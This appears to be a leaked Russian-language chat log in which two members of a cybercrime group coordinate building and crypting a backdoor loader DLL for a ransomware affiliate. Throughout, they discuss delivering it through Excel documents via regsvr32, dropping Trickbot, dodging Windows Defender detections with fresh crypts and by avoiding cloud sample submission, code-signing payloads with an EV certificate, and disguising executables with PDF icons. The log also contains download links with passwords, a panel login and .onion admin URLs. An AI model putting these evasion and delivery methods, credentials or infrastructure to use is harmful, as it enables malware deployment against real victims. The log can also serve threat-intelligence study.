[26.07.21 15:55:33] manuel:		Привет.
[26.07.21 16:32:12] manuel:		Золотой спаршивал про доработку БК
[26.07.21 16:32:45] manuel:		Про дроп 3 файлов на жесткий и запуск батника. Это вообще возможно? Если да, то когда по срокам?
[26.07.21 16:34:07] manuel:		Хорошо.
[27.07.21 09:46:20] manuel:		Првиет. Там зевс жалуется что БК не стучало вчера.
[27.07.21 09:47:38] manuel:		Понятно.
[29.07.21 07:57:42] manuel:		Привет.
[29.07.21 07:58:06] manuel:		Не понятно почему за этот час была куча проверрок
[29.07.21 07:58:11] manuel:		ждем с новго часа
[29.07.21 07:58:18] manuel:		исчерпали
[29.07.21 07:58:26] manuel:		через 2 минуты можно
[29.07.21 07:58:48] manuel:		там дневной 300 точно не исчерпали
[29.07.21 07:59:29] manuel:		ага походу баг
[29.07.21 08:02:53] manuel:		щас попробую там просканить напрямую
[29.07.21 09:20:20] manuel:		Првиет .Да там ограничение по дневному сканированию за вчера много сканов было
[29.07.21 09:20:33] manuel:		Будем менять тариф чтобы было больше сканов
[29.07.21 09:56:18] manuel:		Заработал динчек
[30.07.21 08:10:04] manuel:		Привет.
[30.07.21 08:10:29] manuel:		Да zolotoy@ из жабы
[30.07.21 08:10:49] manuel:		Что скажешь? Можно такое сделать?
[30.07.21 08:11:23] manuel:		Как отдельный билд?
[30.07.21 08:12:39] manuel:		Отпуск - это хорошо ) Понятно.
[30.07.21 08:13:05] manuel:		спасибо.
[02.08.21 12:56:18] manuel:		Привет. Нам нужен БК 15 группы, dll? для netwalker@ для ехеля. regsvr32
[02.08.21 12:57:15] manuel:		Понятно. Тогда мне еще нужен доступ туда
[02.08.21 12:57:37] manuel:		нет
[02.08.21 12:57:46] manuel:		z7hs у меня только
[02.08.21 13:07:48] manuel:		Принял
[02.08.21 13:08:28] manuel:		Хорошо
[02.08.21 13:13:42] manuel:		Хорошо
[02.08.21 15:04:45] manuel:		Есть новсти по крипту?
[02.08.21 15:05:10] manuel:		Есть новсти по крипту?
[02.08.21 15:09:42] manuel:		Еще надо для нашего клиента сделать БК
[02.08.21 15:09:45] manuel:		<mango> бро надо для tom@ сделать бк панель и файлы
[02.08.21 15:26:17] manuel:		+
[02.08.21 15:26:54] manuel:		Точно не знаю. Стукнешь ему?
[03.08.21 09:27:27] manuel:		Добрый день. Сделай, пожалуйста, крипт БК 16 группы для нетволкера ,как вчера.
[03.08.21 09:46:33] manuel:		ага. припоминаю такой ник
[03.08.21 09:46:40] manuel:		а пасс?
[03.08.21 09:47:58] manuel:		да есть сейчас посмотрю.
[03.08.21 09:49:22] manuel:		Да, работает. Спасибо!
[03.08.21 09:49:43] manuel:		Ага.
[03.08.21 10:11:54] manuel:		спасибо.
[03.08.21 16:42:59] manuel:		Не в курсе.  Он не писл тебе?
[03.08.21 16:43:03] manuel:		Давй спрошу
[03.08.21 16:54:45] manuel:		Чери говрит делать
[03.08.21 16:58:15] manuel:		Хорошо
[03.08.21 17:03:07] manuel:		Подскажи, robin пишет: столкнулись с проблемой из бк не переносятся воркгрупп боты в трик.
[03.08.21 17:06:46] manuel:		Можешь ему стукнуть?
[03.08.21 17:07:02] manuel:		robin
[03.08.21 17:07:17] manuel:		Тут в рокете
[03.08.21 17:07:53] manuel:		спс )
[04.08.21 07:47:08] manuel:		Првиет.
[04.08.21 07:47:35] manuel:		Надо спросить cesar он выдает линки с тройкой
[04.08.21 10:13:47] manuel:		Привет. Принял. Сделай, пожалуйста, еще для БК нетволкера, группа16 под ехель, как вчера.
[04.08.21 10:28:56] manuel:		Скажи, акакя группа у robin в бк?
[04.08.21 10:36:31] manuel:		Сможешь мне сделать крипт? Мне нужно протетсировать сгрузку с бк в трик.
[04.08.21 11:54:11] manuel:		ок. жду 16 для нетволкера
[04.08.21 14:17:38] manuel:		по БК 16 группа уже на завтра
[04.08.21 15:11:44] manuel:		Подскажи, а как бк длл запускать? Какая точка входа? Группа 19 которую ты прислал на тест
[04.08.21 15:12:02] manuel:		Подскажи, а как бк длл запускать? Какая точка входа? Группа 19 которую ты прислал на тест
[04.08.21 15:12:52] collin:		regsvr32 file.dll
[04.08.21 15:13:36] manuel:		спс
[04.08.21 15:48:45] manuel:		Можешь посмотреть что с ботом: ddfde222ad8e39e71a768615ed31d9b4
[04.08.21 15:49:05] manuel:		запустил на нашем сервере вм и что то он пропал из списка ботов
[04.08.21 15:49:12] manuel:		и команда по запуску длл зависла
[04.08.21 15:49:34] collin:		он есть в реестре Bots
[04.08.21 15:49:49] collin:		что-то с адресами прокладочными, они не отвечают сейчас
[04.08.21 15:49:55] collin:		написал админам
[04.08.21 15:50:17] collin:		у бота последний отстук 15 минут назад висит
[04.08.21 15:50:57] manuel:		Ясно. Ждем ка прокладки поднимут
[04.08.21 16:06:09] collin:		прокладки легли все полностью, Рокко чинит, обещает минут через 15 починить
[04.08.21 16:07:08] manuel:		понятно. Ждем.
[04.08.21 16:41:50] manuel:		Подняли прокладки?
[04.08.21 16:42:19] collin:		да подняли сегодняшние
[04.08.21 16:42:20] collin:		можно тестить
[04.08.21 16:42:38] manuel:		перезапускать с чистой? или этот же поднимется?
[04.08.21 16:43:33] collin:		должен подняться но он не скоро может, минут 40-60
[04.08.21 16:43:44] manuel:		ок тогда перезапущу заново
[04.08.21 16:58:24] manuel:		У меня на тестовой отстучал трик через БК. Но деф задетектил: Trojan:Script/Wacatac.B!ml 
И файл: file: c:\Users\user\AppData\Local\Temp\1BFB.dll
[04.08.21 16:58:40] manuel:		Сам трик весит в процессах и работает.
[04.08.21 16:59:31] manuel:		По этому пути БК запускает трик ? Или БК не сохраняет вообще на жесткий файлы?
[04.08.21 16:59:58] collin:		задетектил бк или трик?
[04.08.21 17:00:51] manuel:		щас посмотрю по размеру
[04.08.21 17:00:53] collin:		кодер писал вроде в %temp% дропает перед запуском
[04.08.21 17:01:17] collin:		а что в боте, отчет по команде вылез?
[04.08.21 17:03:51] manuel:		да по размеру это трик
[04.08.21 17:03:59] manuel:		получается детект на запуск трика
[04.08.21 17:04:31] collin:		какой у тебя бот?
[04.08.21 17:04:44] manuel:		ddfde222ad8e39e71a768615ed31d9b4
[04.08.21 17:04:45] collin:		гляну что в отчете
[04.08.21 17:05:01] collin:		`Сам трик весит в процессах и работает.` - т.е. его задетектил но не убил деф?
[04.08.21 17:05:11] collin:		точно знаешь что это трик?
[04.08.21 17:05:55] manuel:		Да. Он стучит в админку. Потом деф удалил сам бк детект: Behavior:Win32/DefenseEvasion.A!ml
[04.08.21 17:06:13] manuel:		Да конечно. Я сам выдавал этот крипт с билд машины
[04.08.21 17:06:19] manuel:		им и проверял на тестовой
[04.08.21 17:06:27] manuel:		плюс трик стучит в админку
[04.08.21 17:07:05] collin:		`Потом деф удалил сам бк ` - и бк перестал стучать?
[04.08.21 17:07:32] manuel:		сейчас сделаю запрос
[04.08.21 17:07:39] manuel:		Удалли длл лоадера
[04.08.21 17:08:00] collin:		понятно
[04.08.21 17:10:16] manuel:		Сам БК отраотал запрос
[04.08.21 17:10:56] manuel:		Сейчас попробую перезапустить машину и посмотрю отстуки
[04.08.21 17:13:13] collin:		C:\Users\user\Downloads\1\dl2.dll - это крипт бк, его деф удалил?
[04.08.21 17:13:26] manuel:		После перезапуска окно с ошибкой: http://prntscr.com/1j37gab
[04.08.21 17:13:32] manuel:		Это закреп БК?
[04.08.21 17:13:39] manuel:		да
[04.08.21 17:14:03] manuel:		и следующее окно http://prntscr.com/1j37nwh
[04.08.21 17:14:36] collin:		первое не от бк, второе похоже на закреп
[04.08.21 17:17:27] manuel:		Могу попробовать с дргуим криптом трика. Имеет смысл?
[04.08.21 17:18:57] collin:		давай попробуем
[04.08.21 17:19:04] collin:		бк тоже новый крипт сделать?
[04.08.21 17:19:10] collin:		наверное новый лучше
[04.08.21 17:19:14] manuel:		да давай
[04.08.21 17:31:31] collin:		а можешь с панели крипт забрать
[04.08.21 17:31:35] collin:		или лучше в архиве скинуть?
[04.08.21 17:32:06] manuel:		давй заберу с панели
[04.08.21 17:32:35] collin:		вкладка COL файл dl2_x64_19_341_27906_1.dll - в dl2_x64_19_341.dll
[04.08.21 17:33:12] manuel:		ок
[04.08.21 17:45:20] collin:		крипт группа 16 для netwalker
[04.08.21 17:45:24] collin:		```
RA:=HD+xt;Ax)6uL
https://privatlab.com/s/v/M99Dx8WyROcRNwJVypwd
https://privatlab.com/s/d/M99Dx8WyROcRNwJVypwd/e6k4k#delete
https://dyncheck.com/scan/id/7156621f0ec0c3537a2cfdbf35477057
https://dyncheck.com/scan/id/8e45b4d67fb1219cd685ae5272b20cc7
```
[04.08.21 17:46:17] manuel:		Хорошо. Уже на завтра.
[05.08.21 07:37:31] collin:		привет!
[05.08.21 07:37:40] manuel:		Привет.
[05.08.21 07:38:11] collin:		можешь зайти в админку бк только не через тор-браузер, желательно firefox?
[05.08.21 07:38:32] manuel:		простой фаерфокс?
[05.08.21 07:38:38] manuel:		без настроек?
[05.08.21 07:39:02] collin:		фаерфокс настроенный для работы с тор-ресурсами
[05.08.21 07:39:11] collin:		если нету готового - тогда не надо
[05.08.21 07:39:12] manuel:		Да настрою только
[05.08.21 07:39:19] manuel:		Нету настроеного
[05.08.21 07:39:53] manuel:		Вчера вторая версия криптов отработала на ура. Единственное, что трик задетектил после перезапуска акактак на закреп
[05.08.21 07:40:18] collin:		и трик отстучал, в обоих случаях получается
[05.08.21 07:40:29] collin:		не похоже на то что у них
[05.08.21 07:41:08] manuel:		да.
[05.08.21 07:48:54] manuel:		Сделай, пожалуйста, крипт dll БК группа 16 для нетволкера.
[05.08.21 07:51:07] collin:		+
[05.08.21 08:55:57] collin:		крипт группа 16 для netwalker
[05.08.21 08:56:00] collin:		```
f_wNnO(sSb7d-IJr
https://privatlab.com/s/v/lGGk6nxJxMH0o4jO3pQJ
https://privatlab.com/s/d/lGGk6nxJxMH0o4jO3pQJ/dR2GY#delete
https://dyncheck.com/scan/id/cca84b44c1675fa98464e2cf5cdf9a0f
https://dyncheck.com/scan/id/4f6ec3148f497cc5afdab5d95b7a4327
```
[05.08.21 08:56:08] manuel:		Хорошо
[05.08.21 09:29:29] manuel:		Сделаешь мне еще длл 19 группы для теста таймаута?
[05.08.21 09:30:27] collin:		+
[05.08.21 09:30:43] collin:		wild выдаст
[05.08.21 09:30:50] manuel:		гуд.
[06.08.21 10:23:36] manuel:		Добрый день. Сделай, пожалуйсьа крипт БК длл 16 группы под ехель для Нетволкера
[06.08.21 10:27:21] collin:		привет ок
[06.08.21 11:25:40] collin:		крипт БК группа 16
[06.08.21 11:25:43] collin:		```
)]^4nD?7,0Jd2*t<
https://privatlab.com/s/v/m22DO3jjexHlNjMVzaRW
https://privatlab.com/s/d/m22DO3jjexHlNjMVzaRW/gqm4q#delete
https://dyncheck.com/scan/id/c109efb737654478e0c091d8d6b21884
```
[06.08.21 11:26:20] manuel:		Хорошо. Спасибо.
[06.08.21 12:46:57] manuel:		Длл не стучит
[06.08.21 12:47:09] manuel:		ни в ехеле ни отдельно.
[06.08.21 12:47:35] manuel:		Длл не стучит не в ехеле ни отдельно
[06.08.21 12:51:36] collin:		как запускаешь?
[06.08.21 12:51:49] manuel:		regsvr32 dll.dll
[06.08.21 12:52:08] collin:		сейчас еще раз проверю
[06.08.21 12:52:18] manuel:		ага
[06.08.21 12:52:57] collin:		какой у тебя айпи на тестовой машине?
[06.08.21 12:53:50] manuel:		199.189.108.71
[06.08.21 13:03:00] collin:		у меня работает
[06.08.21 13:03:32] collin:		а сколько ждал?
[06.08.21 13:03:40] collin:		в этой сборке отстук долгий, надо до 15 минут
[06.08.21 13:03:40] manuel:		30-40 минут
[06.08.21 13:03:52] manuel:		до сих пор запушен на 2 машинах
[06.08.21 13:03:58] collin:		странно
[06.08.21 13:04:15] collin:		сейчас еще раз прогоню на другой ВМ
[06.08.21 13:05:33] collin:		а вчера работало?
[06.08.21 13:05:42] manuel:		да все отлично было
[06.08.21 13:05:46] manuel:		Сразу отстукивало
[06.08.21 13:06:21] collin:		какой бот вчера был?
[06.08.21 13:07:44] manuel:		Не вчера а 2 было. https://lch5nnzyb5aof43pitcrzkmnvlr4xkrestpj4cpwstvgej34kqq6wqyd.onion/sOIDFhsAIUfhu42332uygt27634ft7yuaFGyaugkJFsayjegf--_-GBASfdvt23fv/index.php?r=testbots%2Fcommand&id=28dda74094dd675fedc53a1c5ee52cc0
[06.08.21 13:07:46] manuel:		вот он
[06.08.21 13:08:22] collin:		не он
[06.08.21 13:08:29] collin:		в 16 группе формат айди другой
[06.08.21 13:08:39] manuel:		это как?
[06.08.21 13:09:15] collin:		ну сборк адругая
[06.08.21 13:09:38] collin:		вчера я выдавал крипт файл "l_dll_rgsv_64_p2_16_v38_04_08_21_logs_no_llvm_28292_1.dll" - он в этот бот не мог стучать
[06.08.21 13:10:09] collin:		так в этом и нет вчера отстука, послений 03.08
[06.08.21 13:10:23] manuel:		Да походу вчера не пускали в работу.
[06.08.21 13:11:39] collin:		соберу логированный
[06.08.21 13:53:21] collin:		```
0%s5w:#_=Tvedfvh
https://file.io/HPxGwQsCkDVI

```
[06.08.21 13:53:39] collin:		это логированный БК группа 16
[06.08.21 13:54:01] collin:		запусти его минут на 20, в c:\temp запишется лог
[06.08.21 13:54:29] collin:		папку эту создай предварительно "c:\temp" - не помню создает ли сам модуль
[06.08.21 13:54:53] collin:		скинешь лог - посмотрим с кодером
[06.08.21 14:27:33] collin:		забыл сказать - в логированной версии там консольное окошко отображается, не закрывай его
[06.08.21 14:32:03] manuel:		понял
[06.08.21 15:38:27] manuel:		Сейчас пришлю лог
[06.08.21 15:38:52] manuel:		Сейчас пришлю лог
[06.08.21 15:39:49] manuel:		```
HGFDj23f8ubsjdhbgkj3h4bkgjhbjhkbsdf
https://file.io/kXZFg2ndvGWb
```
[06.08.21 15:39:53] manuel:		Вот лог
[06.08.21 15:48:14] collin:		и не отстучал?
[06.08.21 15:49:04] manuel:		https://lch5nnzyb5aof43pitcrzkmnvlr4xkrestpj4cpwstvgej34kqq6wqyd.onion/sOIDFhsAIUfhu42332uygt27634ft7yuaFGyaugkJFsayjegf--_-GBASfdvt23fv/index.php?r=honeypots%2Fcommand&id=1409861362684196355512440419317839413746
[06.08.21 15:49:15] manuel:		оно? там с другого айпи закупал
[06.08.21 15:49:18] manuel:		запускал
[06.08.21 15:49:31] manuel:		159.48.55.69
[06.08.21 15:50:30] collin:		значит он
[06.08.21 15:51:03] collin:		попал в хани, может с этим что-то
[06.08.21 15:51:32] manuel:		а паралельно запушен сегодняшний крипт - не стучит
[06.08.21 15:52:11] collin:		а можешь боевой крипт еще раз запустить на этой же машине
[06.08.21 15:52:15] collin:		где логированный шел
[06.08.21 15:52:21] manuel:		да.
[06.08.21 15:52:23] collin:		я перекинул бота в тестовые
[06.08.21 15:52:28] collin:		должен будет в него же стукнуть
[06.08.21 15:52:42] collin:		так
[06.08.21 15:53:13] collin:		а ты на этой же машине запускал боевой уже, и он не отстучал?
[06.08.21 15:55:05] manuel:		Боевой на другой
[06.08.21 15:55:29] collin:		я думал ты на той же запускал, иначе не показательно
[06.08.21 15:55:37] collin:		а работают вообще по 16 группе? в админке 1 бот от 2 августа и то похож на тестовой
[06.08.21 15:55:47] collin:		а я всю неделю крипты выдаю
[06.08.21 15:55:54] collin:		и хани нету даже
[06.08.21 15:56:42] manuel:		нет не работали там что то с ехелем было
[06.08.21 15:56:52] manuel:		делали картинку подбирали таргеты
[06.08.21 16:06:45] manuel:		Странно. Отстучал боевой
[06.08.21 16:07:03] manuel:		Попробую тогда с ехелем с этой машины. А почему с другой не стучит?
[06.08.21 16:07:40] collin:		так я тебе и дал логированный для этого
[06.08.21 16:07:45] collin:		чтобы ты прогнал его на проблемной машине
[06.08.21 16:08:03] collin:		а ты прогнал но другой, получается?
[06.08.21 16:08:13] manuel:		да паралельная.
[06.08.21 16:08:22] manuel:		с другой версией винды 10
[06.08.21 16:08:26] collin:		прогони на проблемной логированный еще раз
[06.08.21 16:08:27] manuel:		без последних обнов
[06.08.21 16:08:54] collin:		скинь лог мне и elijah продублируй, если не отсучит
[06.08.21 16:09:14] manuel:		+
[06.08.21 16:09:15] collin:		я отлучусь, чат онлайн оставлю
[06.08.21 16:09:37] collin:		лучше в жабу скинь, чтобы не потерялось
[09.08.21 08:03:19] manuel:		Привет. Сделай, пожалуйста, крипт длл бк группа 16 для нетволкера.
[09.08.21 08:05:18] collin:		привет, ок
[09.08.21 08:20:15] collin:		насчет пятничной проблемой с отстуком: elijah скинет тебе свою тестовую сборку полностью логированную, прогони ее на проблемной ВМ, потом скинь мне логи бота и лоадера
[09.08.21 08:20:32] manuel:		Хорошо. Жду
[09.08.21 09:40:43] manuel:		Отстучала логированная сборка от elijah
[09.08.21 09:40:58] manuel:		Отстучала логированная сборка от elijah
[09.08.21 09:41:52] collin:		значит не определим в чем ошибка была,
[09.08.21 09:41:57] collin:		до следующего проявления видимо
[09.08.21 09:42:10] manuel:		Видимо.
[09.08.21 09:42:19] manuel:		Тогда жду боевую версию.
[09.08.21 12:35:01] manuel:		Есть новсти по БК дял нетволкера?
[09.08.21 12:35:35] manuel:		Есть новсти по БК дял нетволкера?
[09.08.21 12:35:48] collin:		жду сборку, кодер молчит пока
[09.08.21 12:35:55] manuel:		Хорошо ждем.
[09.08.21 13:38:03] collin:		крипт группа 16
[09.08.21 13:38:09] collin:		```
>Wb*_M}4!*=^/:(+
https://privatlab.com/s/v/jjjqNWYLODszM8970p4b
https://privatlab.com/s/d/jjjqNWYLODszM8970p4b/jo8nA#delete
https://dyncheck.com/scan/id/b51a0f7dd750bd2e2664f6b411758213
```
[09.08.21 13:38:20] manuel:		+
[09.08.21 13:57:05] manuel:		Все ок. Отстучало
[09.08.21 13:57:29] collin:		фухх.
[09.08.21 13:57:49] manuel:		ага.
[09.08.21 14:47:44] manuel:		а с ехелем не работает
[09.08.21 14:47:49] manuel:		на той же машине
[09.08.21 14:51:24] collin:		эксель от rand@
[09.08.21 14:51:25] collin:		?
[09.08.21 14:52:36] manuel:		да
[09.08.21 15:03:56] collin:		в экселе модификация есть, требуется доработка БК
[09.08.21 15:04:07] collin:		сегодня выдать совместимый не сможем
[09.08.21 15:13:23] manuel:		ТОлько завтра получается?
[09.08.21 15:13:43] collin:		уточняю, ранд говорит вроде работало раньше
[09.08.21 15:15:34] collin:		сегодня не получится, насчет завтра - завтра с утра скажу
[09.08.21 15:15:40] manuel:		понял
[10.08.21 08:23:00] collin:		привет!
[10.08.21 08:23:21] collin:		поправили вчерашнюю проблему совместимости с экселем по группе 16, готовы собрать
[10.08.21 08:23:26] collin:		нужно на сегодня?
[10.08.21 08:26:24] manuel:		Привет да, коненчо!
[10.08.21 08:49:37] manuel:		Еще dollar@ просит исходник БК. Можешь дать ?
[10.08.21 08:49:43] manuel:		dll
[10.08.21 08:50:27] collin:		исхходник 16 группы?
[10.08.21 08:51:00] collin:		у меня его нет в контактах, через тебя передать?
[10.08.21 08:57:52] manuel:		нет это не 16 группа это из команды где войд
[10.08.21 08:58:20] manuel:		Могу я переслать
[10.08.21 08:58:38] collin:		а какую группу тогда?)
[10.08.21 08:58:50] manuel:		а какя у них?
[10.08.21 08:58:59] collin:		у Дерека?
[10.08.21 08:59:03] collin:		воид сам не работает же
[10.08.21 08:59:05] manuel:		да
[10.08.21 08:59:21] collin:		g5
[10.08.21 08:59:29] manuel:		вот
[10.08.21 08:59:39] manuel:		тогда исходник этой группы
[10.08.21 09:00:06] collin:		скинет Порфирио тебе тогда
[10.08.21 09:00:12] manuel:		ок
[10.08.21 09:33:13] collin:		крипт группа 16
[10.08.21 09:33:15] collin:		```
)wig]54WElzf-7Al
https://privatlab.com/s/v/pwwAD5rByesBMjpA6o4e
https://privatlab.com/s/d/pwwAD5rByesBMjpA6o4e/Yp9ag#delete
https://dyncheck.com/scan/id/dadbd8a7fb59d29b1c4b0e54637afc5f
```
[10.08.21 09:34:01] manuel:		Хорошо. делаем.
[10.08.21 11:35:02] manuel:		<Crypt13> Потому что личит деф, после отработки
C:\Users\Test\AppData\Local\Temp\Damp
сюда дропается после запуска БК 
[14:33:55] <Crypt13> Но это уже не ексель 
[14:34:04] <Crypt13> Trojan:Script/Wacatac.B!ml 
[14:34:12] <Crypt13> file: C:\Users\Test\AppData\Local\Temp\Damp\lldhgdbon.exe 
[14:34:24] <Crypt13> Сама БК
[10.08.21 11:35:10] manuel:		надо переделывать крипт
[10.08.21 12:36:11] manuel:		Снова детект на 16 бк
[10.08.21 12:36:15] manuel:		Trojan:Script/Wacatac.B!ml
[10.08.21 12:36:25] manuel:		file: c:\users\t11\appdata\local\temp\damp\nhnppmo.exe
[10.08.21 12:36:37] manuel:		regkey: HKCU@S-1-5-21-1109838703-2706433462-160415434-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\RealtechUpdate
[10.08.21 12:36:47] manuel:		runkey: HKCU@S-1-5-21-1109838703-2706433462-160415434-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\RealtechUpdate
[10.08.21 12:38:05] manuel:		Переделайте, пожалуйста, крипт.
[10.08.21 12:41:19] collin:		детект прямого крипта, или в связке с экселем?
[10.08.21 12:41:52] manuel:		связка с ехелем
[10.08.21 12:42:17] collin:		т.е. с экселем работает сейчса?
[10.08.21 12:42:25] collin:		ранд писал, не стучит
[10.08.21 12:43:09] manuel:		я проверял просто крипт с линка где лежит под ехель.  С параметром -silent у меня все отстучало. Проверяю с ехелем - детект
[10.08.21 12:43:15] manuel:		одна и та же машина
[10.08.21 12:43:54] collin:		проверяешь тот же крипт?
[10.08.21 12:44:11] collin:		его деф второй видет, логично что детект
[10.08.21 12:44:28] collin:		или ты без облака проверяешь?
[10.08.21 12:45:47] manuel:		без автоотправки образцовоткатываю машину
[10.08.21 12:46:25] collin:		ну ты с облаком проверяешь, при первом запуске хеш крипта ушел в виндеф, при втором детект
[10.08.21 12:46:35] collin:		надо отдельные крипты на каждый запуск
[10.08.21 12:46:47] collin:		так определились ведь?
[10.08.21 12:46:48] manuel:		а как в работе быть?
[10.08.21 12:46:58] collin:		боевые крипты тем более перед запуском с облаком не тестим
[10.08.21 12:47:00] manuel:		пстоянный новый крипт?
[10.08.21 12:47:08] manuel:		аа точно забыл
[10.08.21 12:47:27] collin:		это заказчики на своей стороне решают - некоторые серию криптов берут сразу, некоторые меняют хеш на уровне бинарника
[10.08.21 12:47:50] collin:		сейчас сделаю два свежих крипта короче
[10.08.21 12:47:56] manuel:		понял
[10.08.21 12:48:05] collin:		может стаб запалился, тестировщик пишет с 6 сегодня проблемы каки-то
[10.08.21 12:48:20] manuel:		да, возможно.
[10.08.21 14:05:57] collin:		новый крипт 16
[10.08.21 14:05:59] collin:		```
)H]JB3OGPp[:DyT[
https://privatlab.com/s/v/066pbQBxAdfN72jpRy2A
https://privatlab.com/s/d/066pbQBxAdfN72jpRy2A/Exw25#delete
https://dyncheck.com/scan/id/063c99f08f36f9597247b2a31303c826
```
[10.08.21 14:06:19] manuel:		Повтори, пожалуйста.
[10.08.21 14:06:45] collin:		новый крипт №1 группа 16
[10.08.21 14:06:48] collin:		```
)H]JB3OGPp[:DyT[
https://privatlab.com/s/v/066pbQBxAdfN72jpRy2A
https://privatlab.com/s/d/066pbQBxAdfN72jpRy2A/Exw25#delete
https://dyncheck.com/scan/id/063c99f08f36f9597247b2a31303c826
```
[10.08.21 14:07:45] manuel:		хорошо.
[10.08.21 14:33:40] collin:		можешь подписать экзе-крипты
[10.08.21 14:33:53] collin:		если дадим крипты и сертификат?
[10.08.21 14:36:00] manuel:		Да. С Т делал.
[10.08.21 14:36:37] collin:		экзешников много будет, серия 50 штук
[10.08.21 14:36:48] collin:		автоматизировано подписание или каждый отдельно?
[10.08.21 14:37:08] collin:		```
[17:27:02] <landslide> у меня на vps серт висит 
[17:27:09] <landslide> сигнтул только поставить 
```
[10.08.21 14:37:25] collin:		это Розетка у тебя есть егоконтакт? или может ты есть в чате хакеров
[10.08.21 14:37:28] manuel:		какой серт?
[10.08.21 14:37:32] collin:		вот этом https://lzgy66fsb3tos45k32us4drtnack73k3yiwa7fnts7xn4wbjtp2begid.onion
[10.08.21 14:37:37] manuel:		Да есть в жабе
[10.08.21 14:37:50] manuel:		да и там есть
[10.08.21 14:38:15] collin:		он landslide@jabb.im в жабе и rozetka в том рокете
[10.08.21 14:38:50] collin:		переговори сним плз уточни какой у него
[10.08.21 14:38:55] manuel:		стукну в рокете в той как мануэль я там
[10.08.21 14:40:49] collin:		ок
[10.08.21 15:08:19] collin:		группа 16 второй крипт
[10.08.21 15:08:22] collin:		```
uIk6.Fp*9-Y,teEi
https://privatlab.com/s/v/9mm9OydqAoFNL05qEV4Q
https://privatlab.com/s/d/9mm9OydqAoFNL05qEV4Q/XObWa#delete
https://dyncheck.com/scan/id/8a7e005c43c5c3bf9d7b4640e398846d
https://dyncheck.com/scan/id/874d0ab23b52e4af223a619fadeb6cab
```
[10.08.21 15:09:37] manuel:		++
[10.08.21 16:10:21] collin:		общался с розеткой?
[10.08.21 16:10:33] manuel:		да
[10.08.21 16:11:14] collin:		получится с его ключем подписать модули?
[10.08.21 16:11:31] manuel:		он пока не давал ключ
[10.08.21 16:12:05] collin:		когда выдаст получится?
[10.08.21 16:12:36] manuel:		Смотря что выдаст. Конечно получится если ЕВ серт у него
[11.08.21 08:43:47] manuel:		Привет. Сделай пожалуйста, 2 длл для ехелей группа 16 для нетволкера и группа g5 для dollar
[11.08.21 08:56:27] collin:		привет!
[11.08.21 08:57:28] collin:		g5 скинет Порфирио
[11.08.21 08:57:34] manuel:		хорошо
[11.08.21 08:57:41] manuel:		с regsvr32 ?
[11.08.21 08:58:18] collin:		g5 с запуском "rundll32 file.dll,GlobalOut" сейчас
[11.08.21 08:58:37] manuel:		regsvr32 можно сделать?
[11.08.21 08:58:52] manuel:		говрят в ехеле рандлл32 палится
[11.08.21 08:59:04] collin:		отдельную сборку или всю переделать?
[11.08.21 08:59:32] collin:		g5- группа дерека, может лучше его подождем, пусть он скажет как надо?
[11.08.21 08:59:34] manuel:		отдельную
[11.08.21 08:59:51] manuel:		меня доллар попросил сделать для теста ехель у ренда
[11.08.21 09:00:04] manuel:		а дерек и войд свой ехель делают
[11.08.21 09:00:40] collin:		зачем именно g5 тогда?
[11.08.21 09:00:54] manuel:		можно любую другую группу
[11.08.21 09:01:00] manuel:		главное им дать доступ туда
[11.08.21 09:10:43] collin:		будет отдельная сборка, порфирио скинет крипт
[11.08.21 09:10:54] manuel:		хорошо
[11.08.21 09:10:58] manuel:		спасибо
[11.08.21 09:11:05] collin:		группу 16 тоже Порфирио скинет
[11.08.21 09:11:14] manuel:		хорошо
[11.08.21 10:20:43] manuel:		Сделаем еще новый БК для @leo ?
[11.08.21 10:23:53] collin:		новая учетка и группа?
[11.08.21 10:24:04] collin:		через тебя учетку выдать?
[11.08.21 10:24:17] collin:		какой БК нужен - архитектура, способ запуска, режимы?
[11.08.21 10:24:29] manuel:		Новая учетки и новая группа. Пока они думают в в каком виде.
[11.08.21 14:37:33] collin:		```
b46
cN7kFMd6kEBs7kBWKj83bDNs
```
[11.08.21 14:37:37] collin:		учетка для лео
[11.08.21 14:37:45] collin:		зарезервировал группу 22 под него
[11.08.21 15:00:34] manuel:		Прнял. Спасибо
[11.08.21 15:31:14] collin:		а не ты тестил для Виода файл БК сегодня, или связку с экселем его?
[11.08.21 15:31:25] collin:		Воида*
[11.08.21 15:32:35] manuel:		нет angelo
[12.08.21 08:11:16] manuel:		Добрый день. Сегодея еужны крипты бк длл 16 группа под ехель и 22 группа для Лео. Ему нужно 10 криптов  БК в ехе со значками пдф.
[12.08.21 08:13:04] collin:		привет!
[12.08.21 08:13:22] collin:		для лео 1) с автозакрепом или без
[12.08.21 08:13:30] collin:		2) x86 или x64?
[12.08.21 08:13:59] collin:		3) значек pdf любой или конкретный надо?
[12.08.21 08:14:13] manuel:		Щас уточню.
[12.08.21 08:15:06] manuel:		3) - любой
2) - х64
1) - да
[12.08.21 08:15:40] collin:		нужна ли фильтрация по странам, пакеты автозапуска команд?
[12.08.21 08:17:16] manuel:		можно тебе его сапп стукнет? merch@
[12.08.21 08:17:37] collin:		ок
[12.08.21 08:18:02] manuel:		В жабе
[12.08.21 10:20:55] manuel:		Сделай, пожалуйста, сборку бк длл для ехеля для команды дерека - g5 группа с запуском regsvr32
[12.08.21 10:27:19] collin:		крипт тебе направлять, один?
[12.08.21 10:27:51] manuel:		Да можно пару, я его отдам ехельщику.
[12.08.21 10:28:51] collin:		тестируют или для работы?
[12.08.21 10:29:05] manuel:		Для работы. Хотят прослать дургой ехель.
[12.08.21 10:29:09] manuel:		От ренда
[12.08.21 10:29:50] collin:		по БК последнее время объем заказов возрос
[12.08.21 10:29:58] collin:		надо бы тестера еще
[12.08.21 10:30:07] collin:		пока в резерв, но если больше будет - то задействую
[12.08.21 10:30:23] manuel:		Понял.
[12.08.21 11:45:15] manuel:		По БК для команды дерека отбой.
[12.08.21 11:46:00] collin:		`- g5 группа с запуском regsvr32` - по ней отбой?
[12.08.21 11:46:12] manuel:		да.
[12.08.21 11:46:17] collin:		ок
[12.08.21 12:05:15] collin:		я со следующей неделе в отпуске
[12.08.21 12:05:25] collin:		вместо меня Элрой по всем вопросам касательно БК
[12.08.21 12:05:32] manuel:		Понятно.
[12.08.21 12:13:48] collin:		Порфирио хочет тоже в отпуск с 6 сентября
[12.08.21 12:14:04] collin:		так что нужен будет тестеровщик на время его отсутствия
[12.08.21 12:14:24] manuel:		И потом я так понимаю на постоянку да?
[12.08.21 12:15:01] collin:		ну тут зависит от задач, последнее время расширяемся
[12.08.21 12:15:28] manuel:		Понятно.
